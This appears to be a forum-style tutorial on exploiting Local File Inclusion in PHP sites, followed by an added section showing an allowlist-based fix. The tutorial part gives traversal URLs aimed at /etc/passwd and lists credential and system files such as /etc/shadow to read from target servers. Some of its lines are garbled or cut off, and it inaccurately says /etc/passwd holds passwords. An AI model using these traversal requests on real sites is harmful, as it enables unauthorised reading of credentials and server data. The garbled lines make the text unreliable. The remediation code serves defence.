Local File Inclusion (L.F.I.) is a common website hacking trick. This tutorial will show you how to exploit a website using L.F.I.
First of all, take a look at the PHP code given below.
<?php
// The request parameter is used as the include path with no validation.
$page = $_GET['page'];
include($page);
?>
Code like the above is used on many websites by web developers, but it should not be used, because $page isn't sanitized and is passed directly to include(). This code is used by hackers for L.F.I.
In general, you have seen many URLs like this:
http://www.site.com/index.php?page=products.php
The value passed through the query string is used to include the products.php page by the PHP code given above, without checking the format of the value inserted in the URL.
Suppose we request a URL like this:
http://www.site.com/index.php?page=mypage.php
This mypage.php does not exist on the server, so it will show a PHP error message on the webpage:
Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........
here we go..
we know this is vulnerable.
If this website is hosted on a Unix server, then we might be able to do a directory traversal to the password file.
The /etc/passwd file is where the users/passwords are stored:
http://www.mywebsite.com/index.php?page=../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
try adding ../ till you get access to the passwd file..
here note one thing.
if the URL is like this.
You can also view:
/etc/profile
/etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
These files will also give you some useful information about the server system.
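The fix for the include() shown at the top, as an added example that is not code from the original post: the request value is treated only as a key into a fixed allowlist, and the resolved path is checked to stay inside the pages directory, so neither an unknown name nor ../ sequences ever reach include(). ALLOWED_PAGES, resolve_page() and the temporary demo directory are hypothetical names chosen for illustration, and the inputs are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the request supplies only a key, never a path.
const ALLOWED_PAGES = [
    'products' => 'products.php',
    'contact'  => 'contact.php',
];

// Return the absolute path to include, or null if the request must be refused.
function resolve_page(string $requested, string $baseDir): ?string
{
    // 1. Exact-match lookup: "../etc/passwd" or "mypage.php" is simply not a key.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // 2. Defence in depth: canonicalise the path and confirm it stays inside
    //    $baseDir (catches a symlink or a careless allowlist entry).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // missing file: refuse quietly, no include() warning
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: build a throwaway pages directory so the script runs offline.
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
@mkdir($pagesDir);
file_put_contents($pagesDir . '/products.php', '<?php echo "product list\n";');

// Constructed inputs standing in for $_GET['page'].
foreach (['products', 'mypage.php', '../etc/passwd', 'contact'] as $page) {
    $target = resolve_page($page, $pagesDir);
    if ($target === null) {
        // Generic response: the path-revealing PHP warning is never produced.
        echo str_pad($page, 16), "-> 404 Not Found\n";
        continue;
    }
    echo str_pad($page, 16), '-> ';
    include $target;
}

unlink($pagesDir . '/products.php');
rmdir($pagesDir);
```

In a real handler, confirm that $_GET['page'] is set and is a string before calling resolve_page(), and keep display_errors off in production so include() warnings are logged rather than shown.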